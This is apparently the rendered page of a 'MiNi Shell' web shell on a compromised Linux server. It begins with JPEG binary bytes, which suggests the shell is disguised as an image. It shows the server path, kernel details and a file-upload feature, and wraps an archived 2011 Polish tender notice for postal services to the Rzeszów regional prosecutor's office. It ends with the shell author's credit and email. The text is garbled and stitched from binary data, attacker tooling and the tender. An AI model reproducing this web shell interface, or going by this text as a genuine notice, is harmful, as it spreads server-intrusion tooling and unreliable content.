JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111017/272093-N-2011.html

<p class="kh_header"><b>Rzeszów: ŚWIADCZENIE USŁUG POCZTOWYCH W OBROCIE KRAJOWYM I ZAGRANICZNYM DLA PRZESYŁEK O WADZE POWYŻEJ 50 g DLA PROKURATURY OKRĘGOWEJ W RZESZOWIE 
ORAZ PODLEGŁYCH PROKURATUR REJONOWYCH</b><br>
<b>Numer ogłoszenia: 272093 - 2011; data zamieszczenia: 17.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Rzeszowie , Plac Śreniawitów 3, 35-959 Rzeszów, woj. podkarpackie, tel. 017 8756200, faks 017 8524010.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG POCZTOWYCH W OBROCIE KRAJOWYM I ZAGRANICZNYM DLA PRZESYŁEK O WADZE POWYŻEJ 50 g DLA PROKURATURY OKRĘGOWEJ W RZESZOWIE 
ORAZ PODLEGŁYCH PROKURATUR REJONOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla przesyłek o wadze powyżej 50g dla Prokuratury Okręgowej w Rzeszowie oraz podległych prokuratur rejonowych. 
Zamówienie polega w szczególności na odbiorze, przyjmowaniu, przemieszczaniu, doręczaniu i zwrotach przesyłek listowych i paczek pocztowych o masie powyżej 50 g opłacanych w formie opłaty z dołu w kategoriach przesyłek: priorytetowych i ekonomicznych. 
1.1. Usługą objęte są w szczególności następujące rodzaje przesyłek:
a)	przesyłki listowe nierejestrowane ekonomiczne,
b)	przesyłki listowe polecone ekonomiczne,
c)	przesyłki listowe za potwierdzeniem odbioru (ZPO) ekonomiczne,
d)	przesyłki listowe nierejestrowane priorytetowe, 
e)	przesyłki listowe polecone priorytetowe,
f)	przesyłki listowe za potwierdzeniem odbioru (ZPO) priorytetowe,
g)	paczki pocztowe, 
h)	inne przesyłki wg cennika wykonawcy.
1.2. W przypadku przesyłek w obrocie zagranicznym, dana strefa oznacza obrót na terenie:
Strefa A - Europy (łącznie z Cyprem, całą Rosją i Izraelem)
Strefa B - Ameryki Północnej, Afryki,
Strefa C - Ameryki Południowej, Środkowej i Azji
Strefa D - Australii i Oceanii.

2.	Wspólny słownik CPV: 64110000-0 - usługi pocztowe.

3.	Usługi powinny być świadczone zgodnie z następującymi przepisami: 
a)	Prawo Pocztowe (Dz.U.2008.189.1159 ze zm.),
b)	Rozporządzenie Ministra Infrastruktury w sprawie warunków wykonywania powszechnych usług pocztowych.(Dz.U.2004.5.34 ze zm.),
c)	Rozporządzenie Ministra Infrastruktury w sprawie reklamacji powszechnej usługi pocztowej w zakresie przesyłki rejestrowanej i przekazu pocztowego. (Dz.U.2003.183.1795 ze zm.),
d)	Międzynarodowe Przepisy Pocztowe.

4.	Usługi pocztowe stanowiące przedmiot zamówienia obejmują w szczególności:
1)	przesyłki o wagach:
a)	ponad 50g do 100 g gabaryt (A i B)*
b)	ponad 100g do 350 g gabaryt (A i B)*
c)	ponad 350 g do 500 g gabaryt (A i B)*
d)	ponad 500 g do 1000 g gabaryt (A i B)*
e)	ponad 1000g do 2000 g gabaryt (A i B)*


*Gabaryt A to przesyłki o wymiarach:
Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140mm,
Maksimum - żaden z wymiarów nie może przekraczać: wysokość 20mm, długość 325mm, szerokość 230mm.
Gabaryt B to przesyłki o wymiarach:
Minimum - jeżeli choć jeden z wymiarów przekracza wysokość (grubość) 20mm lub długość 325mm, lub szerokość 230mm,
Maksimum - suma długości, szerokości i wysokości (grubości) nie przekracza 900mmm, przy czym długość nie może przekroczyć 600 mm.
2)	paczki o wagach:
a)	do 1kg gabaryt (A i B)*
b)	ponad 1-2 kg gabaryt (A i B)*
c)	ponad 2-5 kg gabaryt (A i B)*
d)	ponad 5-10 kg gabaryt (A i B)*
**Gabaryt A to paczki o wymiarach:
Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140mm,
Maksimum - żaden z wymiarów nie może przekraczać: wysokość 300mm, długość 600mm, szerokość 500 mm.
Gabaryt B to paczki o wymiarach:
Minimum - jeżeli choć jeden z wymiarów przekracza długość 600 mm, szerokość 500mm,wysokość 300mm
Maksimum-suma długości i największego obwodu mierzonego w innym kierunku niż długość -3000mm, przy czym największy wymiar nie może przekroczyć 1500mm.

5.	Odbiór przesyłek z jednostek Zamawiającego winien być świadczony w dni robocze od poniedziałku do piątku przez przedstawiciela Wykonawcy na podstawie stosownego upoważnienia w następujących godzinach wg wykazu:
a)	Prokuratura Okręgowa w Rzeszowie, Plac Śreniawitów 3, godz.14.00-14.30,
b)	Prokuratura Rejonowa w Rzeszowie, ul. Lisa-Kuli 20, godz.14.00-14.30,
c)	Prokuratura Rejonowa dla miasta Rzeszów, ul. Geodetów 1, godz.14.00-14.30,
d)	Prokuratura Rejonowa w Łańcucie, ul. Grunwaldzka 10, godz.14.30-15.00,
e)	Prokuratura Rejonowa w Leżajsku, ul. Mickiewicza 31, godz. 8.00-11.00,
f)	Prokuratura Rejonowa w Ropczycach, ul. Sienkiewicza 1, godz. 14.30-15.00,
g)	Prokuratura Rejonowa w Strzyżowie, ul.8 Marca 9, godz.14.30-15.00,
h)	Prokuratura Rejonowa w Dębicy, ul.3 Maja 2, godz.14.00-14.30.

Zamawiający dopuszcza odbiór poczty w innych godzinach po wcześniejszym ustaleniu z Zamawiającym. Zmiana godzin odbioru nie wymaga zmiany umowy.

6.	Inne wymagania Zamawiającego:
a)	nadanie przesyłek objętych przedmiotem zamówienia następować będzie w dniu ich przekazania Wykonawcy przez Zamawiającego,
b)	usługa dostarczania przesyłek świadczona będzie do każdego wskazanego przez Zamawiającego adresu w Polsce i za granicą,
c)	Zamawiający będzie nadawał przesyłki w stanie uporządkowanym, według rodzaju i wagi. Przesyłki rejestrowane nadawane będą na podstawie wykazu przesyłek poleconych według wzoru druku ustalonego przez zamawiającego - zał. nr 2 do rozporządzenia Ministra Sprawiedliwości z dnia 18.06.2003 r. w sprawie szczegółowych zasad i trybu doręczania pism sądowych w postępowaniu karnym (Dz. U. Nr 108, poz.1022). Przesyłki nierejestrowane nadawane będą na podstawie wykazu nadanych


    
        przesyłek. Wykazy będą sporządzane w dwóch egzemplarzach -po jednym dla Zamawiającego i
        Wykonawcy,
d)	Zamawiający będzie korzystał z własnych wzorów druków potwierdzenia odbioru zał. nr 1 do rozporządzenia Ministra Sprawiedliwości z dnia 18.06.2003 r. w sprawie szczegółowych zasad i trybu doręczania pism sądowych w postępowaniu karnym (Dz. U. Nr 108, poz.1022),
e)	Zamawiający  korzystał będzie z zawiadomień adresata  o pozostawieniu przesyłki (awizo) wg wzoru stanowiącego  załącznik nr 3 do rozporządzenia Ministra Sprawiedliwości z dnia 18.06.2003 r. w sprawie szczegółowych zasad i trybu doręczania pism sądowych w postępowaniu karnym (Dz. U. Nr 108, poz.1022),
f)	 Wykonawca zobowiązany jest doręczać przesyłki pocztowe, przesłane za jego pośrednictwem do Zamawiającego, każdego dnia roboczego w godzinach pomiędzy 7.30-8.00,
g)	zwrot niedoręczonych przesyłek do siedzib Zamawiającego odbywać się będzie niezwłocznie po wyczerpaniu możliwości ich doręczenia, z podaniem przyczyny niedoręczenia,
h)	świadczenie przez Wykonawcę dla przesyłek rejestrowanych, usługi komplementarnej - potwierdzenia odbioru przesyłki rejestrowanej: Wykonawca będzie doręczał do siedzib Zamawiającego pokwitowane przez adresata potwierdzenie odbioru, niezwłocznie po dokonaniu doręczenia przesyłki, nie później niż w ciągu 7 dni roboczych od dnia doręczenia,
i)	okres rozliczeniowy ustala się na 1 miesiąc. Podstawą rozliczeń finansowych jest suma opłat za nadane i zwrócone przesyłki oraz zlecone usługi komplementarne stwierdzone na podstawie dokumentów nadawczych i oddawczych, w okresie rozliczeniowym, zgodnie z ofertą Wykonawcy oraz cennikiem usług pozostałych obowiązujących u Wykonawcy. Cennik usług będzie stanowił załącznik do umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy dotychczasowemu wykonawcy usług stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 13.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży:
a)	oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ,
b)	aktualne zezwolenie na wykonywanie działalności pocztowej wydane przez Prezesa Urzędu Komunikacji Elektronicznej zgodnie z art.6 ustawy z dnia 12 czerwca 2003 r. Prawo pocztowe (Dz.U.2008.189.1159) lub oświadczenie o ustawowym zwolnieniu z uzyskania ww. zezwolenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wymaga się aby  oferta wraz ze wszystkimi załącznikami była podpisana przez osoby
   uprawnione do reprezentowania wykonawcy. W sytuacji reprezentowania  wykonawcy 
   przez pełnomocnika  do  oferty  winno być dołączone  pełnomocnictwo w formie oryginału 
   lub notarialnie poświadczonej kopii.

2.Wykonawcy  mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art.23 ustawy 
   Pzp. W takiej sytuacji  ustanawiają pełnomocnika do reprezentowania ich  w postępowaniu 
   o udzielenie zamówienia publicznego lub  reprezentowania w postępowaniu i zawarcia 
   umowy w sprawie  zamówienia publicznego. Przepisy dotyczące wykonawcy  stosuje się 
   odpowiedni do wykonawców wspólnie  ubiegających się o udzielenie zamówienia  
   publicznego. Pełnomocnictwo do reprezentowania w postępowaniu  o udzielenie 
   zamówienia publicznego lub reprezentowania w postępowaniu i zawarcia umowy w 
   sprawie zamówienia publicznego  w przypadku składania ofert przez wykonawców 
   wspólnie   ubiegających się  o udzielenie zamówienia  Wykonawca składa w formie 
   oryginału  lub notarialnie poświadczonej kopii.

3.Pełnomocnictwa sporządzone w języku obcym Wykonawca składa w raz z tłumaczeniem  
   na język polski przez tłumacza przysięgłego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy zgodnie z art.144 ustawy Pzp.
1.	Zakres przewidywanych zmian: 
a)	zmiana cen jednostkowych brutto w poszczególnych pozycjach wpisanych przez Wykonawcę w Formularzu cenowym stanowiącym załącznik nr 2 do SIWZ w sytuacji spowodowanej zmianami cen tych pozycji zgodnie z przedłożonym przez Wykonawcę dokumentem zatwierdzającym te zmiany przez Prezesa Urzędu Komunikacji Elektronicznej lub w sposób dopuszczony przez Prawo pocztowe.
b)	zmianę cen jednostkowych brutto dotyczącą tzw. opustów cenowych w stosunku do poszczególnych pozycji wpisanych przez Wykonawcę w Formularzu cenowym stanowiącym załącznik nr 2 do SIWZ w sytuacji spowodowanej zmianami cen tych pozycji zgodnie z zawartymi przez jednostkę nadrzędną Zamawiającego lub inny organ państwowy porozumieniami z Wykonawcą lub jednostką nadrzędną Wykonawcy ,lub zastosowania opustów cenowych przez Wykonawcę 
c)	w zakresie realizowania usługi odbioru przesyłek pocztowych z siedzib Zamawiającego w sytuacji spowodowanej realizowaniem tej usługi przez tego samego Wykonawcę w zakresie przesyłek do 50g,
d)	zmianę wynagrodzenia Wykonawcy wpisaną jako wartość umowy z Wykonawcą w przypadku wystąpienia zmian opisanych w pkt a i b i c zatwierdzonych przez Zamawiającego,
e)	zmianę wynagrodzenia Wykonawcy wpisaną jako wartość umowy z Wykonawcą w sytuacji spowodowanej ustawowymi zmianami stawki podatku od towarów i usług (VAT) lub zmianą obowiązku podatkowego Wykonawcy.
2.	Powyższe zmiany wymagają zgody Zamawiającego i Wykonawcy w formie pisemnego aneksu podpisanego przez obie strony pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzeszow.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Rzeszowie, 35-959 Rzeszów, Plac Śreniawitów 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2011 godzina 10:00, miejsce: Biuro Podawcze Prokuratury Okręgowej w Rzeszowie, Plac Śreniawitów 3, 35-959 Rzeszów, pokój 155 (piętro I).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie ustanawia dynamicznego systemu zakupów. Zamawiający nie przewiduje aukcji elektronicznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com